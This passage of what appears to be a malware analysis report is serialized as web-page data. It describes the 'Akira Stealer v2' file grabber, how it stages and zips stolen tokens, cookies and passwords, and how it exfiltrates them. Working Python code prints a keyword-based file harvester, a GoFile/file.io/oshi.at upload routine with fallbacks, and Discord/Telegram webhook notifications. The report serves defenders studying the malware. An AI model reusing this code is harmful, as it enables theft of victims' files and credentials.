                 shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n                            stolen_files.add(file)\n    data.stolen_files.extend(stolen_files)\n",[63,13646,13647,13651,13656,13661,13666,13670,13675,13680,13685,13690,13695,13700,13705,13710,13715,13720,13725,13730,13735,13740,13745,13750],{"__ignoreMap":65},[102,13648,13649],{"class":104,"line":105},[102,13650,8971],{},[102,13652,13653],{"class":104,"line":111},[102,13654,13655],{},"def steal_files():\n",[102,13657,13658],{"class":104,"line":329},[102,13659,13660],{},"    stolen_files = set()\n",[102,13662,13663],{"class":104,"line":346},[102,13664,13665],{}," 
   temp_folder = Utils.get_temp_folder()\n",[102,13667,13668],{"class":104,"line":650},[102,13669,7846],{"emptyLinePlaceholder":2180},[102,13671,13672],{"class":104,"line":656},[102,13673,13674],{},"    for folder in searchFolders:\n",[102,13676,13677],{"class":104,"line":662},[102,13678,13679],{},"        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,13681,13682],{"class":104,"line":668},[102,13683,13684],{},"        if os.path.exists(current_path):\n",[102,13686,13687],{"class":104,"line":674},[102,13688,13689],{},"            for root, _, files in os.walk(current_path):\n",[102,13691,13692],{"class":104,"line":680},[102,13693,13694],{},"                for file in files:\n",[102,13696,13697],{"class":104,"line":9019},[102,13698,13699],{},"                    lower = file.lower()\n",[102,13701,13702],{"class":104,"line":9025},[102,13703,13704],{},"                    # Keyword check\n",[102,13706,13707],{"class":104,"line":9031},[102,13708,13709],{},"                    if any(keyword in lower for keyword in keywordsFiles):\n",[102,13711,13712],{"class":104,"line":9037},[102,13713,13714],{},"                        ext = os.path.splitext(lower)[1]\n",[102,13716,13717],{"class":104,"line":9043},[102,13718,13719],{},"                        # Extension and size check\n",[102,13721,13722],{"class":104,"line":9049},[102,13723,13724],{},"                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[102,13726,13727],{"class":104,"line":9055},[102,13728,13729],{},"                            # Prepare destination\n",[102,13731,13732],{"class":104,"line":9061},[102,13733,13734],{},"                            files_dir = os.path.join(temp_folder, \"Files\")\n",[102,13736,13737],{"class":104,"line":9067},[102,13738,13739],{},"                            os.makedirs(files_dir, exist_ok=True)\n",[102,13741,13742],{"class":104,"line":9073},[102,13743,13744],{},"                         
   shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[102,13746,13747],{"class":104,"line":9079},[102,13748,13749],{},"                            stolen_files.add(file)\n",[102,13751,13752],{"class":104,"line":9085},[102,13753,13754],{},"    data.stolen_files.extend(stolen_files)\n",[12,13756,13757],{},[251,13758,13759],{},"Key points:",[6086,13761,13762,13770,13779,13788,13794],{},[1258,13763,13764,13769],{},[251,13765,13766],{},[63,13767,13768],{},"os.walk",": Recursively descends into subdirectories.",[1258,13771,13772,13775,13776,1014],{},[251,13773,13774],{},"Case-insensitive matching",": Filenames are normalized via ",[63,13777,13778],{},"lower()",[1258,13780,13781,13784,13785,13787],{},[251,13782,13783],{},"Atomic copy",": Uses ",[63,13786,11779],{}," to preserve file content.",[1258,13789,13790,13793],{},[251,13791,13792],{},"Set of stolen filenames",": Prevents duplicate copies when the same file appears twice.",[1258,13795,13796,1062,13801,13804],{},[251,13797,13798,13799],{},"Integration with ",[63,13800,13057],{},[63,13802,13803],{},"data.stolen_files"," accumulates the stolen file list for later reporting.",[186,13806,13808],{"id":13807},"_7115-archiving-and-exfiltration","7.11.5 Archiving and Exfiltration",[12,13810,192],{},[12,13812,13813,13814,13816],{},"After collection, the ",[63,13815,12261],{}," folder is zipped and dispatched:",[56,13818,13820],{"className":8482,"code":13819,"language":8484,"meta":65,"style":65},"# Archive\nUtils.zip_client_file()  # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[63,13821,13822,13827,13832,13836,13841,13846],{"__ignoreMap":65},[102,13823,13824],{"class":104,"line":105},[102,13825,13826],{},"# Archive\n",[102,13828,13829],{"class":104,"line":111},[102,13830,13831],{},"Utils.zip_client_file()  # creates CLIENT.zip from 
temp_folder\n",[102,13833,13834],{"class":104,"line":329},[102,13835,7846],{"emptyLinePlaceholder":2180},[102,13837,13838],{"class":104,"line":346},[102,13839,13840],{},"# Upload & Notify\n",[102,13842,13843],{"class":104,"line":650},[102,13844,13845],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[102,13847,13848],{"class":104,"line":656},[102,13849,13850],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1255,13852,13853,13868],{},[1258,13854,13855,13860,13861,805,13863,805,13865,7885],{},[251,13856,13857],{},[63,13858,13859],{},"zip_client_file()",": Compresses the entire temp directory, including ",[63,13862,12261],{},[63,13864,10315],{},[63,13866,13867],{},"Passwords",[1258,13869,13870,13874,13875],{},[251,13871,13872],{},[63,13873,13038],{},": Posts the download link via Telegram or Discord webhook, listing each stolen filename:",[56,13876,13878],{"className":8482,"code":13877,"language":8484,"meta":65,"style":65},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[63,13879,13880,13885,13890,13895,13900],{"__ignoreMap":65},[102,13881,13882],{"class":104,"line":105},[102,13883,13884],{},"fields.append({\n",[102,13886,13887],{"class":104,"line":111},[102,13888,13889],{},"\"name\": \"📂 Files\",\n",[102,13891,13892],{"class":104,"line":329},[102,13893,13894],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[102,13896,13897],{"class":104,"line":346},[102,13898,13899],{},"\"inline\": False\n",[102,13901,13902],{"class":104,"line":650},[102,13903,13904],{},"})\n",[12,13906,13907],{},[251,13908,13909],{},"Conclusion:",[12,13911,13912],{},"The File Grabber in Akira Stealer v2 systematically hunts for sensitive documents using keyword and extension filters, respects a 2 MB size cap for efficiency, and consolidates stolen items into an archive. 
Its design ensures both breadth (multiple folders) and precision (targeted filters), making it one of the most impactful stages of the malware’s lifecycle.",[41,13914,13916],{"id":13915},"_712-exfiltration-strategy","7.12 Exfiltration Strategy",[12,13918,47],{},[12,13920,13921],{},"The exfiltration module handles harvested tokens and additional artifacts (cookies, autofills, logs) by staging them in a structured directory, compressing into an archive, uploading to multiple online file hosts, and sending detailed webhook notifications. This section deconstructs each step with file paths, domain endpoints, and code references for full traceability.",[186,13923,13925],{"id":13924},"_7121-directory-layout-filenames","7.12.1 Directory Layout & Filenames",[12,13927,192],{},[12,13929,13930],{},"Akira organizes all collected artifacts into a clean and hierarchical temporary directory structure. This design allows for efficient packaging and easy post-exfiltration review by the attacker. Each data category—such as Tokens, Cookies, Passwords, or Screenshots—is stored in its own subfolder under a root path named after the victim’s computer (e.g., DESKTOP1234). This structured layout ensures clarity, minimizes duplication, and streamlines the archiving and upload process. It also makes automated parsing or manual inspection much easier on the attacker side.",[56,13932,13935],{"className":13933,"code":13934,"language":61},[59],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│   ├ token_ab12cd34.txt\n│   └ token_ef56gh78.txt\n├─ Cookies\\\n│   ├ Chrome_Cookies.txt\n│   └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[63,13936,13934],{"__ignoreMap":65},[186,13938,13940],{"id":13939},"_7122-token-artifact-staging","7.12.2 Token & Artifact Staging",[12,13942,192],{},[12,13944,13945],{},"Before exfiltration, Akira stages all relevant artifacts in the corresponding subfolders. 
Token values, for instance, are written into individual .txt files to facilitate quick scanning and validation. Cookies, autofill entries, and passwords are similarly written into structured text files named by browser. This step standardizes the data layout, enabling automated tooling to track what was harvested. It also ensures that the zip archive later reflects a predictable and attacker-friendly format, regardless of which modules were triggered.",[56,13947,13949],{"className":8482,"code":13948,"language":8484,"meta":65,"style":65},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n    f.write(token)\n",[63,13950,13951,13956,13961,13966,13971,13976,13981,13986,13991,13996],{"__ignoreMap":65},[102,13952,13953],{"class":104,"line":105},[102,13954,13955],{},"import os, shutil\n",[102,13957,13958],{"class":104,"line":111},[102,13959,13960],{},"# Constants\n",[102,13962,13963],{"class":104,"line":329},[102,13964,13965],{},"TMP = os.getenv('TEMP')\n",[102,13967,13968],{"class":104,"line":346},[102,13969,13970],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[102,13972,13973],{"class":104,"line":650},[102,13974,13975],{},"# Prepare structure\n",[102,13977,13978],{"class":104,"line":656},[102,13979,13980],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[102,13982,13983],{"class":104,"line":662},[102,13984,13985],{},"    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[102,13987,13988],{"class":104,"line":668},[102,13989,13990],{},"# Save token\n",[102,13992,13993],{"class":104,"line":674},[102,13994,13995],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as 
f:\n",[102,13997,13998],{"class":104,"line":680},[102,13999,14000],{},"    f.write(token)\n",[1255,14002,14003,14006],{},[1258,14004,14005],{},"Tokens saved in separate small text files for quick inspection.",[1258,14007,14008,14009,14012,14013,1014],{},"Cookie dumps from ",[63,14010,14011],{},"Chromium.GetCookies()"," written to ",[63,14014,14015],{},"{Browser}_Cookies.txt",[186,14017,14019],{"id":14018},"_7133-zip-archive-creation","7.13.3 ZIP Archive Creation",[12,14021,192],{},[12,14023,14024,14025],{},"Once staging is complete, Akira compresses the entire directory into a single ZIP archive. The archive filename follows a consistent naming convention: ",[14026,14027,14028,14029],"computer-name",{},"_",[14030,14031,14032],"timestamp",{},".zip, using the host’s machine name and a UTC timestamp in ISO 8601 format. This ensures both uniqueness and chronological traceability. By walking the entire staging directory recursively, every file is preserved in its relative structure within the ZIP. 
This format simplifies bulk retrieval and inspection by attackers, especially if hundreds of victims are compromised in parallel.",[56,14034,14036],{"className":8482,"code":14035,"language":8484,"meta":65,"style":65},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n        for dirpath, _, files in os.walk(root_dir):\n            for fname in files:\n                full = os.path.join(dirpath, fname)\n                rel = os.path.relpath(full, root_dir)\n                zf.write(full, rel)\n    return zip_path\n",[63,14037,14038,14043,14047,14052,14057,14062,14067,14072,14077,14082,14087,14092,14097],{"__ignoreMap":65},[102,14039,14040],{"class":104,"line":105},[102,14041,14042],{},"import zipfile, datetime\n",[102,14044,14045],{"class":104,"line":111},[102,14046,7846],{"emptyLinePlaceholder":2180},[102,14048,14049],{"class":104,"line":329},[102,14050,14051],{},"def create_archive(root_dir: str) -> str:\n",[102,14053,14054],{"class":104,"line":346},[102,14055,14056],{},"    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[102,14058,14059],{"class":104,"line":650},[102,14060,14061],{},"    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[102,14063,14064],{"class":104,"line":656},[102,14065,14066],{},"    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[102,14068,14069],{"class":104,"line":662},[102,14070,14071],{},"    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[102,14073,14074],{"class":104,"line":668},[102,14075,14076],{},"        for dirpath, _, files in os.walk(root_dir):\n",[102,14078,14079],{"class":104,"line":674},[102,14080,14081],{},"            for fname in 
files:\n",[102,14083,14084],{"class":104,"line":680},[102,14085,14086],{},"                full = os.path.join(dirpath, fname)\n",[102,14088,14089],{"class":104,"line":9019},[102,14090,14091],{},"                rel = os.path.relpath(full, root_dir)\n",[102,14093,14094],{"class":104,"line":9025},[102,14095,14096],{},"                zf.write(full, rel)\n",[102,14098,14099],{"class":104,"line":9031},[102,14100,14101],{},"    return zip_path\n",[1255,14103,14104],{},[1258,14105,14106,14107,14110],{},"Archive named ",[63,14108,14109],{},"DESKTOP1234_20250505T123456Z.zip"," for host coherence.",[12,14112,14113],{},[251,14114,14115],{},"ZIP Filename Convention",[12,14117,14118],{},"The archive is named using the compromised host’s computer name followed by a UTC timestamp in ISO format, ensuring uniqueness and chronological order.",[56,14120,14122],{"className":8482,"code":14121,"language":8484,"meta":65,"style":65},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    return zip_path\n",[63,14123,14124,14129,14133,14137,14142,14146,14151,14155,14159],{"__ignoreMap":65},[102,14125,14126],{"class":104,"line":105},[102,14127,14128],{},"import datetime, os\n",[102,14130,14131],{"class":104,"line":111},[102,14132,7846],{"emptyLinePlaceholder":2180},[102,14134,14135],{"class":104,"line":329},[102,14136,14051],{},[102,14138,14139],{"class":104,"line":346},[102,14140,14141],{},"    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[102,14143,14144],{"class":104,"line":650},[102,14145,14056],{},[102,14147,14148],{"class":104,"line":656},[102,14149,14150],{},"    # Construct ZIP filename: 
\u003CComputerName>_\u003CTimestamp>.zip\n",[102,14152,14153],{"class":104,"line":662},[102,14154,14061],{},[102,14156,14157],{"class":104,"line":668},[102,14158,14066],{},[102,14160,14161],{"class":104,"line":674},[102,14162,14101],{},[12,14164,14118],{},[186,14166,14168],{"id":14167},"_7144-upload-workflow","7.14.4 Upload Workflow",[12,14170,192],{},[12,14172,14173],{},"Akira uses a three-tier upload strategy to maximize the chance of successful data exfiltration. It first attempts to upload the archive to GoFile.io using their public API, which returns a download link. If GoFile is unavailable or blocked, it falls back to File.io and then Oshi.at, ensuring the data is always transferred. These services provide anonymous, short-lived hosting, which makes takedown and traceability difficult. The script captures the final download URL and prepares it for webhook delivery.",[6086,14175,14176,14208,14235],{},[1258,14177,14178,14181],{},[251,14179,14180],{},"Primary: GoFile.io",[1255,14182,14183,14191,14199],{},[1258,14184,14185,1062,14188],{},[251,14186,14187],{},"API to fetch servers",[63,14189,14190],{},"GET https://api.gofile.io/servers",[1258,14192,14193,1062,14196],{},[251,14194,14195],{},"Upload endpoint",[63,14197,14198],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[1258,14200,14201,1062,14204,14207],{},[251,14202,14203],{},"Response field",[63,14205,14206],{},"data.downloadPage"," contains final URL.",[1258,14209,14210,14213],{},[251,14211,14212],{},"Fallback #1: File.io",[1255,14214,14215,14225],{},[1258,14216,14217,1062,14219,5276,14222],{},[251,14218,14195],{},[63,14220,14221],{},"POST https://file.io/",[63,14223,14224],{},"files={'file': open(...)}",[1258,14226,14227,14230,14231,14234],{},[251,14228,14229],{},"Response",": JSON ",[63,14232,14233],{},"link"," field.",[1258,14236,14237,14240],{},[251,14238,14239],{},"Fallback #2: 
Oshi.at",[1255,14241,14242,14256],{},[1258,14243,14244,1062,14246,5276,14249,14252,14253,1014],{},[251,14245,14195],{},[63,14247,14248],{},"POST http://oshi.at/",[63,14250,14251],{},"files[]"," and parameters ",[63,14254,14255],{},"expire=43200, autodestroy=0",[1258,14257,14258,14260,14261,1014],{},[251,14259,14229],{},": Plain text containing ",[63,14262,14263],{},"DL: \u003Curl>",[12,14265,14266],{},[251,14267,14268],{},"Implementation Snippet:",[56,14270,14272],{"className":8482,"code":14271,"language":8484,"meta":65,"style":65},"import requests\n\ndef upload_with_fallback(zip_path):\n    # GoFile\n    try:\n        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n        for srv in servers:\n            try:\n                r = requests.post(\n                    f'https://{srv}.gofile.io/contents/uploadfile',\n                    files={'file': open(zip_path,'rb')}, timeout=20)\n                url = r.json()['data']['downloadPage']\n                if url: return url\n            except: continue\n    except: pass\n    # File.io\n    try:\n        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n        return r.json().get('link','')\n    except: pass\n    # Oshi.at\n    try:\n        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n        return text.split('DL: ')[1].strip()\n    except: pass\n    return ''\n",[63,14273,14274,14279,14283,14288,14293,14297,14302,14307,14312,14317,14322,14327,14332,14337,14342,14347,14352,14356,14361,14366,14370,14375,14379,14384,14389,14393],{"__ignoreMap":65},[102,14275,14276],{"class":104,"line":105},[102,14277,14278],{},"import requests\n",[102,14280,14281],{"class":104,"line":111},[102,14282,7846],{"emptyLinePlaceholder":2180},[102,14284,14285],{"class":104,"line":329},[102,14286,14287],{},"def 
upload_with_fallback(zip_path):\n",[102,14289,14290],{"class":104,"line":346},[102,14291,14292],{},"    # GoFile\n",[102,14294,14295],{"class":104,"line":650},[102,14296,9134],{},[102,14298,14299],{"class":104,"line":656},[102,14300,14301],{},"        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[102,14303,14304],{"class":104,"line":662},[102,14305,14306],{},"        for srv in servers:\n",[102,14308,14309],{"class":104,"line":668},[102,14310,14311],{},"            try:\n",[102,14313,14314],{"class":104,"line":674},[102,14315,14316],{},"                r = requests.post(\n",[102,14318,14319],{"class":104,"line":680},[102,14320,14321],{},"                    f'https://{srv}.gofile.io/contents/uploadfile',\n",[102,14323,14324],{"class":104,"line":9019},[102,14325,14326],{},"                    files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,14328,14329],{"class":104,"line":9025},[102,14330,14331],{},"                url = r.json()['data']['downloadPage']\n",[102,14333,14334],{"class":104,"line":9031},[102,14335,14336],{},"                if url: return url\n",[102,14338,14339],{"class":104,"line":9037},[102,14340,14341],{},"            except: continue\n",[102,14343,14344],{"class":104,"line":9043},[102,14345,14346],{},"    except: pass\n",[102,14348,14349],{"class":104,"line":9049},[102,14350,14351],{},"    # File.io\n",[102,14353,14354],{"class":104,"line":9055},[102,14355,9134],{},[102,14357,14358],{"class":104,"line":9061},[102,14359,14360],{},"        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,14362,14363],{"class":104,"line":9067},[102,14364,14365],{},"        return r.json().get('link','')\n",[102,14367,14368],{"class":104,"line":9073},[102,14369,14346],{},[102,14371,14372],{"class":104,"line":9079},[102,14373,14374],{},"    # 
Oshi.at\n",[102,14376,14377],{"class":104,"line":9085},[102,14378,9134],{},[102,14380,14381],{"class":104,"line":9091},[102,14382,14383],{},"        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[102,14385,14386],{"class":104,"line":9097},[102,14387,14388],{},"        return text.split('DL: ')[1].strip()\n",[102,14390,14391],{"class":104,"line":9103},[102,14392,14346],{},[102,14394,14395],{"class":104,"line":9770},[102,14396,14397],{},"    return ''\n",[186,14399,14401],{"id":14400},"_7155-webhook-alerts-attacker-retrieval-analyst-visibility-limits","7.15.5 Webhook Alerts, Attacker Retrieval & Analyst Visibility Limits",[12,14403,192],{},[12,14405,14406],{},"After uploading the ZIP archive, Akira sends a webhook notification—typically to Discord or Telegram—with a structured embed containing detailed information: number of stolen tokens, cookie count, file size, and a clickable download link. This gives attackers immediate feedback and retrieval access. To ensure reliability, a plaintext fallback message is also sent, containing just the archive link. This redundancy guarantees delivery, even if the embed is blocked by the platform or filtered. 
From the defender’s perspective, these communications are often invisible unless outbound network monitoring is in place.",[12,14408,14409],{},[251,14410,14411],{},"Embed Notification",[56,14413,14415],{"className":8482,"code":14414,"language":8484,"meta":65,"style":65},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n    'username':'Akira 💊',\n    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[63,14416,14417,14422,14427,14432,14437,14442,14447,14452,14457,14461,14466,14471,14476,14480],{"__ignoreMap":65},[102,14418,14419],{"class":104,"line":105},[102,14420,14421],{},"# Build embed with key metadata\n",[102,14423,14424],{"class":104,"line":111},[102,14425,14426],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[102,14428,14429],{"class":104,"line":329},[102,14430,14431],{},"fields = [\n",[102,14433,14434],{"class":104,"line":346},[102,14435,14436],{},"    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[102,14438,14439],{"class":104,"line":650},[102,14440,14441],{},"    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[102,14443,14444],{"class":104,"line":656},[102,14445,14446],{},"    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[102,14448,14449],{"class":104,"line":662},[102,14450,14451],{},"    {'name':'🍪 
Cookies','value':str(data.cookie_count),'inline':True},\n",[102,14453,14454],{"class":104,"line":668},[102,14455,14456],{},"    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[102,14458,14459],{"class":104,"line":674},[102,14460,11913],{},[102,14462,14463],{"class":104,"line":680},[102,14464,14465],{},"payload = {\n",[102,14467,14468],{"class":104,"line":9019},[102,14469,14470],{},"    'username':'Akira 💊',\n",[102,14472,14473],{"class":104,"line":9025},[102,14474,14475],{},"    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[102,14477,14478],{"class":104,"line":9031},[102,14479,6410],{},[102,14481,14482],{"class":104,"line":9037},[102,14483,14484],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[1255,14486,14487,14493],{},[1258,14488,14489,14492],{},[251,14490,14491],{},"Delivery",": Sent to the attacker’s Discord/Telegram channel.",[1258,14494,14495,14498,14499,14502],{},[251,14496,14497],{},"Embed Link",": Contains a clickable ",[63,14500,14501],{},"download_url"," pointing to the ZIP on GoFile (or fallback host).",[12,14504,14505],{},[251,14506,14507],{},"Raw Link Fallback",[56,14509,14511],{"className":8482,"code":14510,"language":8484,"meta":65,"style":65},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[63,14512,14513,14518,14523],{"__ignoreMap":65},[102,14514,14515],{"class":104,"line":105},[102,14516,14517],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[102,14519,14520],{"class":104,"line":111},[102,14521,14522],{},"message = f\"📥 Archive available at: {download_url}\"\n",[102,14524,14525],{"class":104,"line":329},[102,14526,14527],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[1255,14529,14530],{},[1258,14531,14532,14535],{},[251,14533,14534],{},"Plain Text",": Guarantees delivery of the link in case embeds are 
blocked or silently dropped.",[12,14537,14538],{},[251,14539,14540],{},"How the Attacker Retrieves the Link",[12,14542,14543,14546],{},[251,14544,14545],{},"1. Webhook Infrastructure","\nThe attacker embeds the webhook endpoint in the malware configuration:",[56,14548,14550],{"className":8482,"code":14549,"language":8484,"meta":65,"style":65},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[63,14551,14552,14557],{"__ignoreMap":65},[102,14553,14554],{"class":104,"line":105},[102,14555,14556],{},"# at class initialization\n",[102,14558,14559],{"class":104,"line":111},[102,14560,14561],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[1255,14563,14564,14571],{},[1258,14565,14566,1062,14568],{},[251,14567,5337],{},[63,14569,14570],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[1258,14572,14573,1062,14576],{},[251,14574,14575],{},"Telegram",[63,14577,14578],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[12,14580,14581,14584],{},[251,14582,14583],{},"2. 
Real-Time Delivery","\nImmediately after a successful file upload, the malware executes:",[56,14586,14588],{"className":8482,"code":14587,"language":8484,"meta":65,"style":65},"payload = {\n  'username': 'Akira 💊',\n  'embeds': [{\n      'title': '🗄️ Exfiltration Complete',\n      'fields': [\n          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n      ]\n  }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[63,14589,14590,14594,14599,14604,14609,14614,14619,14624,14629,14633,14638],{"__ignoreMap":65},[102,14591,14592],{"class":104,"line":105},[102,14593,14465],{},[102,14595,14596],{"class":104,"line":111},[102,14597,14598],{},"  'username': 'Akira 💊',\n",[102,14600,14601],{"class":104,"line":329},[102,14602,14603],{},"  'embeds': [{\n",[102,14605,14606],{"class":104,"line":346},[102,14607,14608],{},"      'title': '🗄️ Exfiltration Complete',\n",[102,14610,14611],{"class":104,"line":650},[102,14612,14613],{},"      'fields': [\n",[102,14615,14616],{"class":104,"line":656},[102,14617,14618],{},"          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[102,14620,14621],{"class":104,"line":662},[102,14622,14623],{},"      ]\n",[102,14625,14626],{"class":104,"line":668},[102,14627,14628],{},"  }]\n",[102,14630,14631],{"class":104,"line":674},[102,14632,6410],{},[102,14634,14635],{"class":104,"line":680},[102,14636,14637],{},"# Transmit the archive URL entirely in the JSON body\n",[102,14639,14640],{"class":104,"line":9019},[102,14641,14642],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[1255,14644,14645,14653],{},[1258,14646,6600,14647,14649,14650,1014],{},[63,14648,14501],{}," variable is interpolated into the embed’s ",[63,14651,14652],{},"fields.value",[1258,14654,14655,14656,14658,14659,6214],{},"For Telegram fallback, the ",[63,14657,14501],{}," appears in the plain-text 
",[63,14660,2232],{},[12,14662,14663],{},[251,14664,14665],{},"3. EDR & Forensic Visibility Limitations",[1255,14667,14668,14677],{},[1258,14669,14670,14673,14674,14676],{},[251,14671,14672],{},"No Local Logging",": The malware does not write the ",[63,14675,14501],{}," to disk or system logs.",[1258,14678,14679,14682],{},[251,14680,14681],{},"EDR Blind Spots",": Tools like Microsoft Defender for Endpoint may flag the HTTP request attempt but cannot extract the embedded URL.",[12,14684,14685],{},[251,14686,14687],{},"4. Why the Analyst Cannot Recover This Locally:",[1255,14689,14690,14703,14722],{},[1258,14691,14692,14695,14696,14698,14699,14702],{},[251,14693,14694],{},"No Local Copy of Link",": The malware writes the ",[63,14697,14501],{}," only in memory and transmits it over the network; it does ",[4328,14700,14701],{},"not"," save this URL to disk or logs.",[1258,14704,14705,14708,14709,14711,1298,14716,14718,14719,1014],{},[251,14706,14707],{},"Ephemeral Staging Cleanup",": Immediately after upload, the code executes:",[531,14710],{},[102,14712,14715],{"className":14713},[14714],"text-monospace","shutil.rmtree(ROOT)",[531,14717],{},"\nerasing all staged artifacts (including any transient text files) from ",[63,14720,14721],{},"%TEMP%",[1258,14723,14724,14727,14728,14731],{},[251,14725,14726],{},"Network-Only Transmission",": Webhook calls (",[63,14729,14730],{},"requests.post",") occur in-memory; no HTTP logs or browser history entries are created on the victim machine.",[2109,14733,14734],{},[12,14735,14736,14739,14740,14742,14743,14745],{},[251,14737,14738],{},"Implication for Analysts:","\nWithout live packet capture (e.g., network TAP or proxy) at the time of execution, the exact ",[63,14741,14501],{}," is unrecoverable post-infection.\nAdditionally, the exfiltrated archive is auto-deleted from the hosting service, further reducing the window for forensic retrieval.\nPost-infection imaging or host-based forensic recovery will ",[4328,14744,14701],{}," 
reveal the attacker’s URL or file host credentials, as no artifacts remain locally.",[52,14747],{"className":14748},[4854,4855],[41,14750,14752],{"id":14751},"_713-conclusion","7.13 Conclusion",[12,14754,47],{},[12,14756,14757,14759],{},[63,14758,4622],{}," (Akira Stealer v2) is a comprehensive, commercially distributed stealer toolkit. It combines extensive targeting, sophisticated anti-analysis, dynamic infrastructure control, and full-stack data theft across credentials, crypto, system profiling, and user files. Its modularity and stealth, combined with rapid reinfection methods, make it one of the most technically advanced stealers observed in active deployment.",[25,14761,14763],{"id":14762},"_8-circular-execution-chain-a-self-healing-loop","8. Circular Execution Chain: A Self-Healing Loop",[12,14765,31],{},[12,14767,14768,14769,14772],{},"One of the most technically sophisticated elements of this campaign is its regenerative, circular execution model. Unlike conventional malware with linear stages that flow from dropper to payload and then vanish, this operation was engineered like a ",[251,14770,14771],{},"closed loop"," — where every component watches over the others.",[12,14774,14775,14776,14779],{},"This ",[251,14777,14778],{},"self-healing architecture"," made the infection chain not only persistent, but also autonomous. It could fully recover from partial removals. As long as one piece remained alive, the entire malware ecosystem could reassemble itself.",[41,14781,14783],{"id":14782},"_81-behavioral-breakdown","8.1 Behavioral 